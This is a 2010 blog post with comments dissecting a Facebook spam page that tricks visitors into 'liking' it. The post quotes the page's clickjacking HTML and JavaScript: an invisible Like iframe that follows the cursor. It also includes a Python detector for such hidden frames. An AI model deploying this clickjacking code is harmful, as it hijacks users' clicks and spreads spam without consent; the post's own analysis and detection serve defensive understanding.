“Smoking Hot Bartenders” is Some Smoking Hot Facebook Spam
Yesterday I noticed a ton of my friends on Facebook were “liking” :|:|:|:|:|:| Smoking Hot Bartenders :|:|:|:|:|. Noticing that even some friends who I would never expect to like that (girls) had done so, I decided to click on it and take a look.
The “Smoking Hot Bartenders” site, of course, is some sort of spam site where the user is prompted to fill out some leadgen form (or offer) in order to access pictures of the “smoking hot bartenders”. Declining to do so, I closed the window and figured that was that.
I was quite surprised to check my feed today and notice that I had “liked” the same page on Facebook. How did this happen?
I decided to take a look at the site, http://cutebabesbartending.info/, and see how they were executing this very viral scheme.
The first thing you see when you land on the site, most likely from Facebook (and hence logged in), is a screen with some hot girls and a link to click through. This link is the key to the scheme.
Taking a look at the source of the page, we see:
<h2>
<a href="photos.html">Continue here to see photos</a>
</h2>
<div style="overflow: hidden; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="aaaa">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fcutebabesbartending.info%2F&layout=standard&show_faces=true&width=450&action=like&font&colorscheme=dark&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:20px; height:20px;" allowTransparency="true" id="xxx" name="xxx"></iframe>
</div>
Note we have here an absolutely positioned DIV with an IFRAME to the Facebook like page. But where is the code that clicks the link? If they are triggering from the click, why does this Facebook like button fire? Check out the code below. Note that id xxx is the iframe itself, and aaaa is the Facebook like button.
<script>
var xxx = 0;
var aaaa = document.getElementById('aaaa');
var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body
function lololol(e){
if (window.event) {
aaaa.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
aaaa.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
}
else {
aaaa.style.top = (e.pageY-5)+'px';
aaaa.style.left = (e.pageX-5)+'px';
}
}
document.onmousemove = function(e) {
if (xxx == 0) {lololol(e);}
}
</script>
This is kind of ingenious: they are re-drawing the Facebook like button so it follows your mouse around the screen, and when you click on the link you click on both the like button and the link to the next page!
But why don’t you see the like button? It’s because the opacity of the parent element is set to 0 (i.e., completely transparent; thanks to commenter Colby Russell for correcting me). Let’s change this and see what happens:

Look at that Facebook like button there by my cursor!
This is fairly brilliant spam – you click off of Facebook and unsuspectingly click on the link to get to the page where you assume there might be spam but you can ignore it. However, unbeknownst to you, you’ve already “liked” the spammy page, and it’s now sitting in your feed waiting for the next sucker, er… friend, to click on it.
Updated: commenter Ryan King notes that the term for this spammy technique is Clickjacking.
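A defender's check for the pattern described in this post, as an added example that is not part of the original post: it parses a page's HTML and reports any Facebook Like iframe that is, or sits inside, an element whose inline style sets opacity to zero. The function and class names and the second (visible) iframe in the sample are assumptions made for illustration; only inline styles are inspected, so hiding done through a stylesheet is out of scope.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input", "link", "meta", "wbr"}
ZERO = re.compile(r"(0+(\.0*)?|\.0+)(\s*!important)?")
IE_ALPHA_ZERO = re.compile(r"alpha\(\s*opacity\s*=\s*0\s*\)")

def is_invisible(style):
    """True if an inline style sets an opacity variant, or the IE alpha filter, to zero."""
    decls = [[p.strip().lower() for p in d.partition(":")] for d in style.split(";")]
    return any((prop.endswith("opacity") and ZERO.fullmatch(val)) or
               (prop == "filter" and IE_ALPHA_ZERO.search(val)) for prop, _, val in decls)

class HiddenLikeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.stack, self.findings = [], []  # stack holds (tag, id, invisible) per open element

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        entry = (tag, a.get("id"), is_invisible(a.get("style") or ""))
        url = urlparse(a.get("src") or "")
        host = (url.hostname or "").lower()
        is_like = (tag == "iframe" and url.path == "/plugins/like.php"
                   and (host == "facebook.com" or host.endswith(".facebook.com")))
        hidden = [e for e in self.stack + [entry] if e[2]]
        if is_like and hidden:  # Like frame that is, or sits inside, a zero-opacity element
            self.findings.append({"iframe_id": a.get("id"), "hidden_by": hidden[0][1],
                                  "liked_url": parse_qs(url.query).get("href", [""])[0]})
        if tag not in VOID:
            self.stack.append(entry)

    def handle_endtag(self, tag):
        tags = [e[0] for e in self.stack]
        if tag in tags:  # pop back to the matching open tag, dropping unclosed children
            del self.stack[len(tags) - 1 - tags[::-1].index(tag):]

def find_hidden_like_frames(html):
    finder = HiddenLikeFinder()
    finder.feed(html)
    return finder.findings

# First div: the markup quoted in the post (query shortened). Second: constructed, visible.
SAMPLE = ('<div style="position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; '
          'opacity: 0.0;" id="aaaa"><iframe src="http://www.facebook.com/plugins/like.php'
          '?href=http%3A%2F%2Fcutebabesbartending.info%2F&action=like" id="xxx"></iframe>'
          '</div><div id="ok"><iframe src="http://www.facebook.com/plugins/like.php'
          '?href=http%3A%2F%2Fexample.com%2F" id="visible"></iframe></div>')
```

Calling `find_hidden_like_frames(SAMPLE)` returns one finding for the iframe `xxx` hidden by `aaaa`; the visible Like button in the second div is not reported.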


Thank you! I got suckered into clicking that button too. Bastards!
tele-mon
25 Aug 10 at 7:28 pm
Button? What button? All I see is boooooooooobs!
Robin Berjon
26 Aug 10 at 7:50 am
how the hell do i unlike it????
cmizz
26 Aug 10 at 8:41 am
Is it just spam or is it a virus too?
Joe
26 Aug 10 at 8:44 am
As far as I can tell (on my mac) it’s not trying to install any file which might have a virus in it, but it’s possible that they’re sniffing browser useragent on the server side and trying to deliver something to windows machines.
Most likely, however, they are just trying to spread virally via facebook so they can get more people to fill out their leadgen forms on the second page and hence make more $$$.
Simon
26 Aug 10 at 8:55 am
Any way to remove it from news feed?
cmizz
26 Aug 10 at 9:19 am
Yep, just go to your news feed (tip: click your name from your facebook “home” page), and then under recent activity you should see “… liked smoking …” Hover over the text and you’ll see a “Remove” link to the right (which will actually be just text), and if you hover over that it becomes a button to remove the post.
Simon
26 Aug 10 at 9:24 am
[...] me here. Maybe I should have asked Jeeves.
More helpfully, this link probably explains it: “Smoking Hot Bartenders” is Some Smoking Hot Facebook Spam – Simon's Corner o… __________________ Feedback | YouTube Channel | Squid 2 Shark [...]
Smokin Hot Bartenders on Facebook - mcarterbrown.com
26 Aug 10 at 12:44 pm
You have way too much time on your hands you FaceBook guru.
Sha Coonie
26 Aug 10 at 2:11 pm
tried to ‘unlike’ this page, and remembered that all pages you “like” show up in your “info” tab under your profile. looked through all the subsections, including “other” and it doesn’t show up. I had already removed it from my feed, but I didn’t think that would “unlike” something I’d legitimately clicked on. I’m wondering if this thing really just writes code to make the line appear in your feed, or if it actually is a legitimate “like” and it’s hidden somewhere in your profile so you can’t “unlike” it?
Wylie
26 Aug 10 at 6:58 pm
This is called clickjacking: http://en.wikipedia.org/wiki/Clickjacking
ryan
26 Aug 10 at 7:23 pm
opacity: 0; would mean it’s completely transparent―i.e., you can see through it. If it were perfectly opaque, you would be able to see it, because you wouldn’t be able to see through it at all. It’s just weird, because you linked to the definition and everything.
Colby Russell
26 Aug 10 at 7:57 pm
Thanks Colby for correcting me – I meant perfectly transparent, of course, but my mind misfired
Simon
26 Aug 10 at 8:03 pm
I’m using Windows XP with security beefed up Mozilla Firefox browser, and I think the likes of NoScript would have probably picked this up and alerted me… I don’t know about any tools for the mac, but guess this plug in works there as well.
Steve
26 Aug 10 at 8:06 pm
This was old in 2008. Nowadays it is not brilliant at all.
http://hackademix.net/2008/10/08/hello-clearclick-goodbye-clickjacking/
required
26 Aug 10 at 8:28 pm
Awesome..that is one hell of a spamming
Machbio
26 Aug 10 at 8:47 pm
i got this virus on my facebook too. please tell me how i get rid of it. my friends at work all can see
boris kukuru
26 Aug 10 at 9:24 pm
@boris – see my comment above about how to remove the “like” from your FB feed..
Simon
26 Aug 10 at 10:42 pm
[...] in Uncategorized Adam retweeted this article from @newsycombinator a 2 hours ago. Since I’m taking an afternoon break from in the summer [...]
“Smoking Hot Bartenders” archive exposed « Anhang's Contemplations
26 Aug 10 at 10:51 pm
[...] a transparent like button that follows the cursor, but I noticed this one got caught on hackernews: http://www.liquidrhymes.com/2010/08/…facebook-spam/ As it's gotten this much popularity I'm not sure if they'll do something about it, so I can't [...]
Auto-like technique caught - Black Hat Forum Black Hat SEO
26 Aug 10 at 11:09 pm
For those who actually want the photos – the archive is totally public. http://bit.ly/csr0hA
Anhang Zhu
26 Aug 10 at 11:10 pm
That is smart, ermmm.
jantanhebat
26 Aug 10 at 11:52 pm
Ingenious !!!
Congratulation !!!
seoguide
27 Aug 10 at 6:44 am
that is genius!
jamie dalgetty
27 Aug 10 at 6:53 am
Seriously, that’s all it takes? No unique token or POST form to prevent this sort of trickery? Man, Facebook wouldn’t know security if it slapped them in the (ahem) face.
⬡
27 Aug 10 at 9:04 am
I never thought I would see someone use the term “brilliant spam” :/
JZ
27 Aug 10 at 10:39 am
Those sneaky buggers, nice find Simon. The one thing I don’t get, is how they appeared to make one click into a facebook iframe also lead to clicking the other link (or at least triggering some code to load a new url)? I’d look closer at their page, but it looks like they’ve already changed it? The cross-domain security restrictions between iframes seem like they’d prevent something like that…
Peter Coles
27 Aug 10 at 10:45 am
old trick and not dangerous
jacka
27 Aug 10 at 11:11 am
@Peter Coles- that’s a great point re: getting the base page link to fire, and now I wish I had figured that out too. I tried to check my browser’s cache, but I forgot I threw it into private browsing before analyzing their shady site..
Simon
27 Aug 10 at 11:19 am
This is exactly why I now run facebook on a totally separate browser than my por — other sites.
aaasglk
27 Aug 10 at 11:56 am
[...] liking a page that said “:|:|:|:|:| Smoking Hot Bartenders :|:|:|”, as described Simon Mosk. Once clicked, users were prompted with the site [...]
Reblogs for 20100828 — AlexWeber.is
28 Aug 10 at 9:00 pm
[...] importantly, DO NOT CLICK ON ANYTHING ON THAT PAGE. Some developers managed to implement an ingenious hack that’ll redraw the Like button and follow your mouse around effectively making the whole page [...]
Wherever I May Roam… » On Facebook Malware
19 Dec 10 at 5:41 pm